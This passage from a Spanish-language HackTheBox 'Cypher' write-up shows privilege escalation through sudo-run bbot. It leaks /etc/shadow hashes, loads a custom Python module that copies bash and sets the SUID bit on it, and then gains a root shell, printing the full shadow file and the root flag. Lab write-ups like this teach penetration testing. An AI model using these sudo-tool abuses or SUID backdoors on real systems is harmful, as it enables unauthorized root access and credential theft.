[VERB] DNS error or timeout for A query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.106 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[VERB] DNS error or timeout for AAAA query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.107 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[VERB] DNS error or timeout for CNAME query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.108 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 5.000 seconds
[INFO] questionable_joyce: Modules running (incoming:processing:outgoing) dnsresolve(0:1:0)
[INFO] questionable_joyce: Events produced so far: SCAN: 1
[INFO] questionable_joyce: No events in queue (9 processed in the past 15 seconds)
[VERB] DNS error or timeout for SRV query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.104 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.998 seconds
[VERB] DNS error or timeout for MX query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.103 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.998 seconds
[VERB] DNS error or timeout for NS query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.103 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[VERB] DNS error or timeout for SOA query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.102 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[VERB] DNS error or timeout for TXT query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.102 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[DNS_NAME_UNRESOLVED]	b23be622c570cb02f01e28b4e38997ef	TARGET	(a-error, aaaa-error, cname-error, in-scope, mx-error, ns-error, soa-error, srv-error, target, txt-error, unresolved)
[INFO] Finishing scan
[VERB] Completed finish()
[VERB] Completed final finish()
[SCAN]              	questionable_joyce (SCAN:2a008a5e1eacbc6b81c464cf7b28674272c487d6)	TARGET	(in-scope)
[VERB] False
[VERB] True
[SUCC] Scan questionable_joyce completed in 21 seconds with status FINISHED
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | Module     | Produced   | Consumed                  |
[INFO] aggregate: +============+============+===========================+
[INFO] aggregate: | dnsresolve | 0          | 1 (1 DNS_NAME)            |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | cloudcheck | 0          | 1 (1 DNS_NAME_UNRESOLVED) |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | speculate  | 0          | 1 (1 DNS_NAME_UNRESOLVED) |
[INFO] aggregate: +------------+------------+---------------------------+
[VERB] aggregate: Wrote scan-stats to /root/.bbot/scans/questionable_joyce/scan-stats-table-20250303_0855_54.txt
[INFO] output.csv: Saved CSV output to /root/.bbot/scans/questionable_joyce/output.csv
[INFO] output.json: Saved JSON output to /root/.bbot/scans/questionable_joyce/output.json
[INFO] output.txt: Saved TXT output to /root/.bbot/scans/questionable_joyce/output.txt
[VERB] EngineClient DNSHelper: shutting down...
[VERB] EngineServer DNSEngine got shutdown signal
[VERB] EngineServer DNSEngine: shutting down...
[VERB] EngineServer DNSEngine: finished shutting down
[INFO] Saved word cloud (17 words) to /root/.bbot/scans/questionable_joyce/wordcloud.tsv
graphasm@cypher:~$

Es posible realizar lo mismo para el archivo /etc/shadow, aunque hay que ejecutarlo varias veces ya que unicamente muestra una linea.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

graphasm@cypher:~$ sudo bbot -y -t /etc/shadow -m httpx --force -v
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Reading targets from file: /etc/shadow
[VERB] Creating events from 36 targets
[WARN] Unable to autodetect event type from "graphasm:$y$j9T$lDLyqZAxCXhX1EB3v01Zl.$C0XwosQvBM.5sAPbHd8oyAK0e8lg0GX5YJHb7qImQV7:20004:0:99999:7:::"
graphasm@cypher:~$ sudo bbot -y -t /etc/shadow -m httpx --force -v
# [...] snip [...]
graphasm@cypher:~$ sudo bbot -y -t /etc/shadow -m httpx --force -v
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Reading targets from file: /etc/shadow
[VERB] Creating events from 36 targets
[WARN] Unable to autodetect event type from "root:$y$j9T$ianAmmc1w6VSodw.1fzgk/$3DenO5YJ1VBvE1VekRL79v6bN00fhcbA59zeeLciY67:20133:0:99999:7:::"
graphasm@cypher:~$

Custom Module

bbot utiliza modulos, segun la documentacion es posible escribir y ejecutar modulos propios, especificandolo en un preset. Utilizamos el modulo de ejemplo para realizar una copia de bash y darle privilegios SUID.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

# /dev/shm/mod.py
from bbot.modules.base import BaseModule
import os

class privesc(BaseModule):    
    os.system("cp /bin/bash /bin/sc; chmod u+s /bin/sc;") 
    watched_events = ["DNS_NAME"] # watch for DNS_NAME events
    produced_events = ["WHOIS"] # we produce WHOIS events
    flags = ["passive", "safe"]
    meta = {"description": "Copy bash and gives SUID to it"}
    options = {"api_key": ""} # module config options
    options_desc = {"api_key": "Key"}
    per_domain_only = True # only run once per domain

    base_url = "http://localhost/"

    # one-time setup - runs at the beginning of the scan
    async def setup(self):
        return None, ""

Creamos un preset especificando la ruta de modulos y el modulo creado.

1
2
3
4
5
6

# preset.yml
description: Privesc
module_dirs:
  - /dev/shm
modules:
  - mod

Ejecutamos bbot con el preset y un objetivo.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

graphasm@cypher:/dev/shm$ sudo bbot -t evilcorp.com -p ./preset.yml --force -y
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Scan with 1 modules seeded with 1 targets (1 in whitelist)
[WARN] Failed to load unknown module "mod"
[ERRR] Failed to load 1 scan modules: mod
[INFO] Loaded 5/5 internal modules (aggregate,cloudcheck,dnsresolve,excavate,speculate)
[INFO] Loaded 5/5 output modules, (csv,json,python,stdout,txt)
[INFO] internal.excavate: Compiling 11 YARA rules
[INFO] internal.speculate: No portscanner enabled. Assuming open ports: 80, 443
[SUCC] Setup succeeded for 12/12 modules.
[SUCC] Starting scan dramatic_glenn
[SCAN]              	dramatic_glenn (SCAN:b22e1a3a93afdc4085d7413440e5e03017508dcb)	TARGET	(in-scope, target)
[INFO] dramatic_glenn: Modules running (incoming:processing:outgoing) dnsresolve(0:1:0)
[INFO] dramatic_glenn: Events produced so far: SCAN: 1
[INFO] dramatic_glenn: No events in queue (9 processed in the past 15 seconds)
[DNS_NAME_UNRESOLVED]	evilcorp.com	TARGET	(a-error, aaaa-error, cname-error, domain, in-scope, mx-error, ns-error, soa-error, srv-error, target, txt-error, unresolved)
[INFO] Finishing scan
[SCAN]              	dramatic_glenn (SCAN:b22e1a3a93afdc4085d7413440e5e03017508dcb)	TARGET	(in-scope)
[SUCC] Scan dramatic_glenn completed in 21 seconds with status FINISHED
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | Module     | Produced   | Consumed                  |
[INFO] aggregate: +============+============+===========================+
[INFO] aggregate: | dnsresolve | 0          | 1 (1 DNS_NAME)            |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | cloudcheck | 0          | 1 (1 DNS_NAME_UNRESOLVED) |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | speculate  | 0          | 1 (1 DNS_NAME_UNRESOLVED) |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] output.csv: Saved CSV output to /root/.bbot/scans/dramatic_glenn/output.csv
[INFO] output.json: Saved JSON output to /root/.bbot/scans/dramatic_glenn/output.json
[INFO] output.txt: Saved TXT output to /root/.bbot/scans/dramatic_glenn/output.txt
[INFO] Saved word cloud (4 words) to /root/.bbot/scans/dramatic_glenn/wordcloud.tsv
graphasm@cypher:/dev/shm$

pspy muestra le ejecucion como root de nuestro comando.

1
2
3
4
5

2025/03/02 03:59:17 CMD: UID=0     PID=84894  | 
2025/03/02 03:59:17 CMD: UID=0     PID=84895  | /opt/pipx/venvs/bbot/bin/python /usr/local/bin/bbot -t evilcorp.com -p ./preset.yml --force -v -y 
2025/03/02 03:59:17 CMD: UID=0     PID=84896  | cp /bin/bash /bin/sc 
2025/03/02 03:59:17 CMD: UID=0     PID=84897  | sh -c -- cp /bin/bash /bin/sc; chmod u+s /bin/sc; 
2025/03/02 03:59:18 CMD: UID=0     PID=84898  | /opt/pipx/venvs/bbot/bin/python -c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=6, pipe_handle=22) --multiprocessing-fork

Shell

Ejecutamos bash como shell privilegiada, logrando obtener root y la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

graphasm@cypher:/dev/shm$ ls /bin/sc
/bin/sc
graphasm@cypher:/dev/shm$ /bin/sc -p
sc-5.2# id
uid=1000(graphasm) gid=1000(graphasm) euid=0(root) groups=1000(graphasm)
sc-5.2# cd /root
sc-5.2# ls
root.txt
sc-5.2# cat root.txt 
8b65fc179421f39a2d9da8969c57ddaf
sc-5.2#

Dump Hashes

Realizamos la lectura del archivo /etc/shadow.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

root:$y$j9T$ianAmmc1w6VSodw.1fzgk/$3DenO5YJ1VBvE1VekRL79v6bN00fhcbA59zeeLciY67:20133:0:99999:7:::
daemon:*:19962:0:99999:7:::
bin:*:19962:0:99999:7:::
sys:*:19962:0:99999:7:::
sync:*:19962:0:99999:7:::
games:*:19962:0:99999:7:::
man:*:19962:0:99999:7:::
lp:*:19962:0:99999:7:::
mail:*:19962:0:99999:7:::
news:*:19962:0:99999:7:::
uucp:*:19962:0:99999:7:::
proxy:*:19962:0:99999:7:::
www-data:*:19962:0:99999:7:::
backup:*:19962:0:99999:7:::
list:*:19962:0:99999:7:::
irc:*:19962:0:99999:7:::
_apt:*:19962:0:99999:7:::
nobody:*:19962:0:99999:7:::
systemd-network:!*:19962::::::
systemd-timesync:!*:19962::::::
dhcpcd:!:19962::::::
messagebus:!:19962::::::
systemd-resolve:!*:19962::::::
pollinate:!:19962::::::
polkitd:!*:19962::::::
syslog:!:19962::::::
uuidd:!:19962::::::
tcpdump:!:19962::::::
tss:!:19962::::::
landscape:!:19962::::::
fwupd-refresh:!*:19962::::::
usbmux:!:20004::::::
sshd:!:20004::::::
graphasm:$y$j9T$lDLyqZAxCXhX1EB3v01Zl.$C0XwosQvBM.5sAPbHd8oyAK0e8lg0GX5YJHb7qImQV7:20004:0:99999:7:::
neo4j:!:20004::::::
_laurel:!:20136::::::
Share on
Dany Sucuc
WRITTEN BY
sckull

Read other posts

HackTheBox - Cypher